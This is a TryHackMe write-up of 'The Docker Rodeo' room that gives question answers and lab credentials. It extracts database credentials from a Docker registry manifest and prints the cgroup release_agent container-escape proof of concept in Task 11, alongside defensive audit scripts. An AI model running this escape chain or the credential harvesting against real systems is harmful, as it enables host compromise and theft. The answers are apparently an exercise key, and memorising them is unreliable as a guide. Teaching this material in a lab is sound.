The Docker Rodeo TryHackme Writeup
By Shamsher Khan. This is a writeup of the TryHackMe room “The Docker Rodeo”.
Room link: https://tryhackme.com/room/dockerrodeo
Note: This room is available to Premium Members only (users who have purchased a THM premium membership).
Task 5. Interacting with a Docker Registry
Question 1. What is the port number of the 2nd Docker registry?
Answer: 7000
Question 2. What is the name of the repository within this registry?
We need to send a GET request to http://docker-rodeo.thm:7000/v2/_catalog to list all the repositories registered on the registry.
Answer: securesolutions/webserver
Question 3. What is the name of the tag that has been published?
Before we can begin analysing a repository, we need two key pieces of information:
1. The repository name
2. Any repository tag(s) published
We already have the repository name (securesolutions/webserver), so now we just need to list all tags that have been published. Every repository has at least one tag, usually the “latest” tag, but there can be many tags, each pointing at different code, for example major software versions or separate “production” and “development” builds.
Send a GET request to http://docker-rodeo.thm:7000/v2/<repository-name>/tags/list to query all published tags. For our repository, the request looks like this: http://docker-rodeo.thm:7000/v2/securesolutions/webserver/tags/list
Answer: production
Question 4. What is the Username in the database configuration?
With these two important pieces of information about a repository known, we can request that repository’s manifest file. The manifest contains various pieces of information about the image, such as its size, its layers and the image configuration (including environment variables). I’m going to grab the manifest for the “production” tag via the following GET request: http://docker-rodeo.thm:7000/v2/securesolutions/webserver/manifests/production
Answer: Admin
Question 5. What is the Password in the database configuration?
Answer: production_admin
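The three requests above (catalog, tag list, manifest) all return JSON, and the credentials in Questions 4 and 5 come from the Env entries embedded in the schema v1 manifest’s history. The following script is an added example, not code from the room or from TryHackMe: it parses those three response shapes and flags environment variables whose names suggest a credential, which is the same check you would run against your own registry to confirm nothing sensitive was baked into an image. The sample responses are constructed and the variable names and values in them are placeholders, not the room’s real data.

```python
"""Audit helpers for a Docker Registry v2 endpoint: parse the JSON returned by
/v2/_catalog, /v2/<repo>/tags/list and /v2/<repo>/manifests/<tag> (schema v1),
and flag environment variables that look like credentials.
Added example; the sample responses below are constructed, not captured."""
import json
import re
import urllib.request
from typing import Dict, List

# Variable names that commonly carry a credential.
SECRET_KEY_RE = re.compile(r"(PASS(WORD)?|SECRET|TOKEN|API_KEY|CREDENTIAL)", re.IGNORECASE)


def fetch_json(url: str, timeout: float = 10) -> str:
    """GET a registry endpoint and return the raw body (not used by the offline samples)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode()


def parse_catalog(body: str) -> List[str]:
    """Repository names from a /v2/_catalog response."""
    return list(json.loads(body).get("repositories") or [])


def parse_tags(body: str) -> List[str]:
    """Published tags from a /v2/<repo>/tags/list response ("tags" may be null)."""
    return list(json.loads(body).get("tags") or [])


def env_from_v1_manifest(body: str) -> Dict[str, str]:
    """Collect Env entries from every v1Compatibility blob in a schema v1 manifest.

    Each history entry carries the image config as a JSON string; the Env list
    lives under config.Env and container_config.Env.
    """
    env: Dict[str, str] = {}
    for entry in json.loads(body).get("history", []):
        compat = json.loads(entry.get("v1Compatibility", "{}"))
        for section in ("container_config", "config"):
            for item in (compat.get(section) or {}).get("Env") or []:
                key, _, value = item.partition("=")
                env.setdefault(key, value)
    return env


def find_secret_env(env: Dict[str, str]) -> Dict[str, str]:
    """Only the variables whose names suggest a credential."""
    return {k: v for k, v in env.items() if SECRET_KEY_RE.search(k)}


# Constructed sample responses (placeholder names and values, not the room's registry).
SAMPLE_CATALOG = '{"repositories":["example/webserver","example/db"]}'
SAMPLE_TAGS = '{"name":"example/webserver","tags":["latest","production"]}'
SAMPLE_MANIFEST = json.dumps({
    "schemaVersion": 1,
    "name": "example/webserver",
    "tag": "production",
    "history": [
        {"v1Compatibility": json.dumps({
            "config": {"Env": ["PATH=/usr/bin", "DB_USER=example_user",
                               "DB_PASSWORD=example_pass"]},
            "container_config": {"Env": ["PATH=/usr/bin"]},
        })},
        {"v1Compatibility": json.dumps({"config": {"Env": ["PATH=/usr/bin"]}})},
    ],
})


def audit_sample() -> Dict[str, str]:
    """Run the parsers over the constructed samples and return the flagged variables."""
    repos = parse_catalog(SAMPLE_CATALOG)
    tags = parse_tags(SAMPLE_TAGS)
    if "example/webserver" not in repos or "production" not in tags:
        raise RuntimeError("sample catalog/tag list did not parse as expected")
    return find_secret_env(env_from_v1_manifest(SAMPLE_MANIFEST))


if __name__ == "__main__":
    for key, value in audit_sample().items():
        # Print only a hint of the value so the audit log itself does not leak it.
        print(f"{key} is set in the image config (value starts with {value[:2]!r})")
```

To run it against a live registry you control, replace the SAMPLE_* strings with fetch_json("http://<registry>:<port>/v2/_catalog") and the corresponding tags and manifest URLs; the manifest parser expects the schema v1 body that the registry returns when no Accept header is sent.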
Task 6. Vulnerability #2: Reverse Engineering Docker Images
Install Dive Tool
wget https://github.com/wagoodman/dive/releases/download/v0.9.2/dive_0.9.2_linux_amd64.deb
sudo apt install ./dive_0.9.2_linux_amd64.deb
Challenge
Pull the challenge image using docker pull docker-rodeo.thm:5000/dive/challenge and apply what we have done above for the questions below.
Remember! You will need to use docker images to get the “IMAGE_ID” for the new image and use that with the dive command.
Question 1. What is the “IMAGE_ID” for the “challenge” Docker image that you just downloaded?
Answer: 2a0a63ea5d88
Question 2. Using Dive, how many “Layers” are there in this image?
Answer: 7
Question 3. What user is successfully added?
Answer: uogctf
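Dive reads the image configuration to show one row per layer together with the command that produced it, which is how the layer count and the added user above are found. The script below is an added example (not code from the room, from TryHackMe or from the Dive project) that does the same inspection offline from a docker save tarball: it counts the filesystem layers from rootfs.diff_ids and scans each history command for useradd/adduser. The tarball it builds is a constructed sample with placeholder names, not the challenge image.

```python
"""Inspect a `docker save` tarball offline: count filesystem layers and list the
users that layer commands add. Added example; the archive built here is a
constructed sample, not the room's challenge image."""
import io
import json
import re
import tarfile
from typing import Any, Dict, List, Tuple

# Matches `useradd [-opts] NAME` or `adduser [--opts] NAME` inside a layer command.
USER_ADD_RE = re.compile(r"\b(?:useradd|adduser)\b\s+(?:-\S+\s+)*(\S+)")


def build_sample_image_tar() -> bytes:
    """Build a minimal docker-save style archive (constructed sample, not a real image)."""
    config: Dict[str, Any] = {
        "architecture": "amd64",
        "rootfs": {"type": "layers", "diff_ids": ["sha256:aaa", "sha256:bbb"]},
        "history": [
            {"created_by": "/bin/sh -c #(nop) ADD file:base in /"},
            # ENV changes metadata only, so it is marked empty_layer and adds no diff_id.
            {"created_by": "/bin/sh -c #(nop)  ENV PATH=/usr/bin", "empty_layer": True},
            {"created_by": "/bin/sh -c useradd -m example_user"},
        ],
    }
    manifest = [{
        "Config": "cfg.json",
        "RepoTags": ["example/challenge:latest"],
        "Layers": ["l1/layer.tar", "l2/layer.tar"],
    }]
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, payload in (("manifest.json", manifest), ("cfg.json", config)):
            data = json.dumps(payload).encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def load_image(tar_bytes: bytes) -> Tuple[Dict[str, Any], Dict[str, Any]]:
    """Return (manifest entry, image config) from a docker-save archive."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        manifest = json.load(tar.extractfile("manifest.json"))[0]
        config = json.load(tar.extractfile(manifest["Config"]))
    return manifest, config


def count_layers(config: Dict[str, Any]) -> int:
    """Filesystem layers are the rootfs diff_ids; empty_layer history entries add none."""
    return len(config["rootfs"]["diff_ids"])


def layer_commands(config: Dict[str, Any]) -> List[str]:
    """The command recorded for each history entry, as Dive shows per layer."""
    return [h.get("created_by", "") for h in config.get("history", [])]


def users_added(config: Dict[str, Any]) -> List[str]:
    """Names passed to useradd/adduser in any layer command."""
    found: List[str] = []
    for cmd in layer_commands(config):
        for match in USER_ADD_RE.finditer(cmd):
            found.append(match.group(1))
    return found


if __name__ == "__main__":
    manifest, cfg = load_image(build_sample_image_tar())
    print("tags:", manifest["RepoTags"])
    print("layers:", count_layers(cfg))
    print("users added:", users_added(cfg))
```

For a real image, run docker save <IMAGE_ID> -o image.tar and pass the file’s bytes to load_image; the manifest’s Layers list should have the same length as count_layers returns.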
Task 11. Vulnerability #7: Misconfigured Privileges (Deploy #2)
Connect to your new Instance using SSH with the following details:
New Instance IP: 10.10.22.173
SSH Port: 2244
Username: root
Password: danny
The code snippet below is a modified version of the Proof of Concept (PoC) created by Trail of Bits, whose write-up details the inner workings of this exploit well.
1. mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
2. echo 1 > /tmp/cgrp/x/notify_on_release
3. host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
4. echo "$host_path/exploit" > /tmp/cgrp/release_agent
5. echo '#!/bin/sh' > /exploit
6. echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
7. chmod a+x /exploit
8. sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
Let’s briefly summarise what happens here:
- We need to create a cgroup so that the Linux kernel will write and execute our exploit for us. The kernel uses “cgroups” to manage processes on the operating system; since the container has the capabilities to manage “cgroups” as root on the host, we can mount the cgroup filesystem at “/tmp/cgrp” inside the container and create a child cgroup “x”.
- For our exploit to execute, we need to tell the kernel to run our code. By writing “1” to “/tmp/cgrp/x/notify_on_release”, we’re telling the kernel to execute the release agent once the last process leaves the “cgroup”. (Paul Menage., 2004)
- We find out where the container’s files are stored on the host (the overlay “upperdir” in /etc/mtab) and store that path in a variable.
- We then write the host-side path of our “/exploit” script into “release_agent”, which is what the kernel will execute once the “cgroup” is released.
- Start our exploit as a shell script by writing the “#!/bin/sh” line into “/exploit”.
- Append a command that copies the host flag into a file named “flag.txt” inside the container’s directory, to run once “/exploit” is executed.
- Make our exploit executable!
- Finally, we start a process and add it to “/tmp/cgrp/x/cgroup.procs”; when it exits the cgroup becomes empty and the kernel runs the release agent.
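The whole chain depends on the container having the privileges to mount a cgroup filesystem, which mount(2) only allows with CAP_SYS_ADMIN, and on no seccomp profile blocking the mount. The script below is an added, defender-side example (not code from the room, from TryHackMe or from Trail of Bits) that decodes the effective capability mask and seccomp mode from /proc/<pid>/status text, so you can check from inside a container whether it was started with the misconfigured privileges this task is about. The two status samples are constructed; the first uses the capability mask that Docker grants unprivileged containers by default, the second a fully privileged mask.

```python
"""Decode CapEff and Seccomp from /proc/<pid>/status to tell whether a container
holds the capabilities (above all CAP_SYS_ADMIN) that let it mount cgroupfs.
Added example; the status texts below are constructed samples."""
from typing import Dict, List, Optional

# Capability names indexed by bit number (include/uapi/linux/capability.h).
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID",
    "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE",
    "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW",
    "CAP_IPC_LOCK", "CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT",
    "CAP_SYS_PTRACE", "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE",
    "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE",
    "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ",
    "CAP_PERFMON", "CAP_BPF", "CAP_CHECKPOINT_RESTORE",
]

# Capabilities that give a containerised process a path to the host; CAP_SYS_ADMIN
# is the one mount(2) requires, so it is the one the cgroup technique needs.
HIGH_RISK = {"CAP_SYS_ADMIN", "CAP_SYS_MODULE", "CAP_SYS_PTRACE", "CAP_SYS_RAWIO",
             "CAP_DAC_READ_SEARCH", "CAP_NET_ADMIN"}


def parse_status_field(status_text: str, field: str) -> Optional[str]:
    """Value of a `Field:\tvalue` line from /proc/<pid>/status, or None if absent."""
    for line in status_text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key == field:
            return value.strip()
    return None


def decode_caps(mask: int) -> List[str]:
    """Capability names for every set bit in a CapEff/CapBnd mask."""
    return [CAP_NAMES[bit] if bit < len(CAP_NAMES) else f"CAP_{bit}"
            for bit in range(mask.bit_length()) if mask >> bit & 1]


def assess(status_text: str) -> Dict[str, object]:
    """Summarise the privilege posture recorded in a status text."""
    cap_field = parse_status_field(status_text, "CapEff")
    if cap_field is None:
        raise ValueError("CapEff line not found")
    caps = decode_caps(int(cap_field, 16))
    seccomp = parse_status_field(status_text, "Seccomp")  # 0 disabled, 1 strict, 2 filter
    return {
        "caps": caps,
        "risky": sorted(set(caps) & HIGH_RISK),
        "can_mount": "CAP_SYS_ADMIN" in caps,
        "seccomp_filtered": seccomp == "2",
    }


def assess_self() -> Dict[str, object]:
    """Assess the current process (Linux only; reads /proc/self/status)."""
    with open("/proc/self/status", encoding="utf-8") as fh:
        return assess(fh.read())


# Constructed samples: Docker's default unprivileged capability set with a seccomp
# filter loaded, and a fully privileged mask with seccomp disabled.
DEFAULT_STATUS = "Name:\tsh\nCapEff:\t00000000a80425fb\nSeccomp:\t2\n"
PRIVILEGED_STATUS = "Name:\tsh\nCapEff:\t0000003fffffffff\nSeccomp:\t0\n"


if __name__ == "__main__":
    for label, text in (("default", DEFAULT_STATUS), ("privileged", PRIVILEGED_STATUS)):
        result = assess(text)
        print(label, "can mount cgroupfs:", result["can_mount"],
              "risky caps:", result["risky"], "seccomp filter:", result["seccomp_filtered"])
```

If assess_self() reports can_mount as True inside a container, the container was started with --privileged or --cap-add SYS_ADMIN; dropping that capability (and keeping the default seccomp and AppArmor profiles) is the fix for this task’s misconfiguration.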
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
For more walkthroughs stay tuned…
Thank you for taking the time to read my walkthrough.
Feedback is always welcome!